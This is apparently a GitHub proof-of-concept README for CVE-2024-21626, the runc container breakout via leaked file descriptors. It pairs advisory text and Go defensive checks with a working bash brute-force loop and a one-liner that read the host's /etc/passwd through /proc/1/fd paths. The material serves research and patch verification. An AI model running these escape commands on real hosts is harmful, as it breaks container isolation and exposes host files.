
CVE-2024-21626 PoC — runc container breakout through process.cwd trickery and leaked fds

Source
Associated Vulnerability
Title: runc container breakout through process.cwd trickery and leaked fds (CVE-2024-21626)
Description: runc is a CLI tool for spawning and running containers on Linux according to the OCI specification. In runc 1.1.11 and earlier, due to an internal file descriptor leak, an attacker could cause a newly-spawned container process (from runc exec) to have a working directory in the host filesystem namespace, allowing for a container escape by giving access to the host filesystem ("attack 2"). The same attack could be used by a malicious image to allow a container process to gain access to the host filesystem through runc run ("attack 1"). Variants of attacks 1 and 2 could also be used to overwrite semi-arbitrary host binaries, allowing for complete container escapes ("attack 3a" and "attack 3b"). runc 1.1.12 includes patches for this issue.
Description: CVE-2024-21626-poc-research-Reappearance-andtodo
Readme
Usage:

1. git clone https://github.com/cdxiaodong/CVE-2024-21626

2. docker-compose up

Verification: if the host's /etc/passwd is read back, the vulnerability is present.

Environment: runc >= v1.0.0-rc93, <= 1.1.11
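To turn the affected range above into a check that can run on a host, the following Go program is an added example, written for this page and not part of this repository or of runc. It parses the first line of `runc --version` output (for example "runc version 1.1.10" or "runc version 1.0.0-rc93") and reports whether the version lies in >= 1.0.0-rc93 and <= 1.1.11. Release candidates are ordered before the final release of the same number, which is what makes 1.0.0-rc92 unaffected and 1.0.0 affected. The version strings used for testing are constructed, not captured from a real host.

```go
package main

import (
	"errors"
	"fmt"
	"os/exec"
	"regexp"
	"strconv"
	"strings"
)

// runcVersion is a parsed runc release number such as 1.1.10 or 1.0.0-rc93.
// rc == 0 marks a final release, which sorts after every rc of the same x.y.z.
type runcVersion struct {
	major, minor, patch, rc int
}

// First line of `runc --version`, e.g. "runc version 1.1.10" or
// "runc version 1.0.0-rc93"; newer tags use "1.2.0-rc.1", hence the optional dot.
var versionRe = regexp.MustCompile(`^runc version (\d+)\.(\d+)\.(\d+)(?:-rc\.?(\d+))?`)

// parseRuncVersion extracts the version from `runc --version` output.
func parseRuncVersion(output string) (runcVersion, error) {
	first := strings.SplitN(strings.TrimSpace(output), "\n", 2)[0]
	m := versionRe.FindStringSubmatch(first)
	if m == nil {
		return runcVersion{}, errors.New("unrecognised runc --version output: " + first)
	}
	var v runcVersion
	v.major, _ = strconv.Atoi(m[1]) // groups are digits only, Atoi cannot fail here
	v.minor, _ = strconv.Atoi(m[2])
	v.patch, _ = strconv.Atoi(m[3])
	if m[4] != "" {
		v.rc, _ = strconv.Atoi(m[4])
	}
	return v, nil
}

// less reports whether a was released before b.
func (a runcVersion) less(b runcVersion) bool {
	if a.major != b.major {
		return a.major < b.major
	}
	if a.minor != b.minor {
		return a.minor < b.minor
	}
	if a.patch != b.patch {
		return a.patch < b.patch
	}
	// Same x.y.z: a final release (rc == 0) is newer than any of its release candidates.
	if a.rc == 0 || b.rc == 0 {
		return a.rc != 0 && b.rc == 0
	}
	return a.rc < b.rc
}

// isAffectedByCVE202421626 applies the advisory range: >= 1.0.0-rc93 and <= 1.1.11.
func isAffectedByCVE202421626(v runcVersion) bool {
	first := runcVersion{major: 1, minor: 0, patch: 0, rc: 93}
	last := runcVersion{major: 1, minor: 1, patch: 11}
	return !v.less(first) && !last.less(v)
}

func main() {
	out, err := exec.Command("runc", "--version").Output()
	if err != nil {
		fmt.Println("cannot run runc --version:", err)
		return
	}
	v, err := parseRuncVersion(string(out))
	if err != nil {
		fmt.Println(err)
		return
	}
	fmt.Printf("runc %d.%d.%d rc=%d affected by CVE-2024-21626: %v\n",
		v.major, v.minor, v.patch, v.rc, isAffectedByCVE202421626(v))
}
```

The version string is the only input, so this is a triage aid, not proof: a distribution may backport the fix without bumping the upstream number, and the brute-force script further down is the actual test.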

Attack details and principle:
In affected runc versions, some internal file descriptors are leaked during initialization, among them a handle to the host's /sys/fs/cgroup, and runc does not verify that the final working directory lies inside the container's mount namespace. An attacker can set process.cwd in the container config to /proc/self/fd/7 (the fd number varies by version, see below), or replace the specific path passed via the --cwd argument when the host invokes runc exec with a symlink to /proc/self/fd/7/, so that the process inside the container ends up with a host directory as its working directory and can read and manipulate the host filesystem, bypassing the container's isolation.
More details (GIF images):


1. The attacker exploits the bug with a self-built docker-poc package: [CVE-2024-21626 runc process.cwd and leaked fds container breakout | Snyk (snyk.io)](https://snyk.io/blog/cve-2024-21626-runc-process-cwd-container-breakout/)
2. That docker image had not been published publicly as of 2024-02-01.
![img_v3_027l_c9651fc0-e6db-4524-9363-1e12fca4f8dg](https://github.com/cdxiaodong/CVE-2024-21626/assets/84082748/1cbd9a99-16be-4883-adf3-162fdc992696)
3. Upstream fix logic: [Merge pull request from GHSA-xr7r-f8xq-vfvv · opencontainers/runc@0212048 (github.com)](https://github.com/opencontainers/runc/commit/02120488a4c0fc487d1ed2867e901eeed7ce8ecf)
4. [runc vulnerable to container breakout through process.cwd trickery and leaked fds · CVE-2024-21626 · GitHub Advisory Database](https://github.com/advisories/GHSA-xr7r-f8xq-vfvv)
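The interesting part of the upstream fix, for anyone writing a similar guard, is that runc init now refuses to continue when the working directory it just chdir'd into is outside the container root. The Go function below is an added example of that kind of check, written for this page and not copied from runc. It relies on two Linux behaviours: getcwd(2) fails with ENOENT when the current directory has been unlinked (and the glibc wrapper reports an unreachable directory as ENOENT as well), and the raw syscall, which Go's syscall.Getwd uses, returns a directory outside the process root as "(unreachable)/..." instead of an absolute path. The decision is kept in a pure function so the "(unreachable)" case can be checked with a constructed input on an unprivileged host; main demonstrates the ENOENT branch with an unlinked temporary directory.

```go
package main

import (
	"errors"
	"fmt"
	"os"
	"path/filepath"
	"syscall"
)

// classifyCwd applies the two checks a post-chdir guard needs to the raw
// result of getcwd(2):
//   - ENOENT: the directory was unlinked, or (with the glibc wrapper) it is
//     unreachable from the process root;
//   - a non-absolute result: the raw syscall reports an unreachable cwd as
//     "(unreachable)/...", which no directory inside the root can look like.
// Any other error is surfaced as a verification failure rather than ignored.
func classifyCwd(wd string, err error) error {
	if errors.Is(err, syscall.ENOENT) {
		return errors.New("cwd is outside the mount namespace root: possible container breakout")
	}
	if err != nil {
		return fmt.Errorf("cannot verify cwd: %w", err)
	}
	if !filepath.IsAbs(wd) {
		return fmt.Errorf("cwd %q is not an absolute path inside the root: possible container breakout", wd)
	}
	return nil
}

// verifyCwd runs the check on the calling process, which is where an init
// would call it: after chdir(process.cwd) and before exec of the entrypoint.
func verifyCwd() error {
	return classifyCwd(syscall.Getwd())
}

func main() {
	// Demonstration without privileges: a normal directory passes, and
	// removing it underneath ourselves trips the ENOENT branch.
	dir, err := os.MkdirTemp("", "cwdcheck")
	if err != nil {
		panic(err)
	}
	if err := os.Chdir(dir); err != nil {
		panic(err)
	}
	fmt.Println("in temp dir:  ", verifyCwd())
	if err := os.Remove(dir); err != nil {
		panic(err)
	}
	fmt.Println("after unlink: ", verifyCwd())
}
```

In the container case the first branch never fires on its own with the raw syscall; it is the "(unreachable)" prefix check that catches a cwd of /proc/self/fd/N pointing at the host, which is why a guard must test both conditions rather than only the error value.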

CVE: [CVE - CVE-2024-21626 (mitre.org)](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-21626)
Discovered by: [CVE-2024-21626 runc process.cwd and leaked fds container breakout | Snyk (snyk.io)](https://snyk.io/blog/cve-2024-21626-runc-process-cwd-container-breakout/)
![image](https://github.com/cdxiaodong/CVE-2024-21626/assets/84082748/bcf6e950-9cd6-45b2-a940-bf86e72b8b49)



The actual fd number may vary with the order in which files are opened; the following script brute-forces it.


```bash
#!/bin/bash

# The leaked fd number depends on the runc version and on open order, so try
# a range of candidates. With cwd = /proc/1/fd/$i, "../../../../.." walks up
# from the leaked host directory handle to the host root, so a /etc/passwd
# that differs from the image's own means that fd pointed outside the container.
for i in {3..10}
do
    echo "trying fd $i"
    # Build the working directory from the loop variable and run the container
    docker run --rm -w /proc/1/fd/$i ubuntu cat ../../../../../etc/passwd
done
```



Local test successful:
fd/9 worked; runc version: 1.1.10, 1.1.2
![image](https://github.com/cdxiaodong/CVE-2024-21626/assets/84082748/06ef9bd1-fc76-46a9-9694-6f48c3b9fc8f)


With runc --version 1.0.0:
![image](https://github.com/cdxiaodong/CVE-2024-21626/assets/84082748/34752d0c-4e3e-4ca1-8617-a024a0cee92a)



With runc --version 1.1.4, fd/8 worked:
![image](https://github.com/cdxiaodong/CVE-2024-21626/assets/84082748/8bb43ed8-1821-4446-8f51-c64a7718c995)



The vulnerability was published today.
More details below.

It can be reproduced in the following ways:
1. Compile runc with a manual breakpoint (wait for input) inserted, to inspect the open fds
2. Attach eBPF probes to runc and break at the relevant point
3. runc create demo, then runc exec demo ls /proc/1/fd -a: the corresponding symlinks are visible directly
4. Brute force: docker run -w /proc/1/fd/0-10 ubuntu cat ../../../../../etc/passwd, iterating the fd number from 0 to 10



todo:
obtain the fd from a runc breakpoint, which is easier to automate



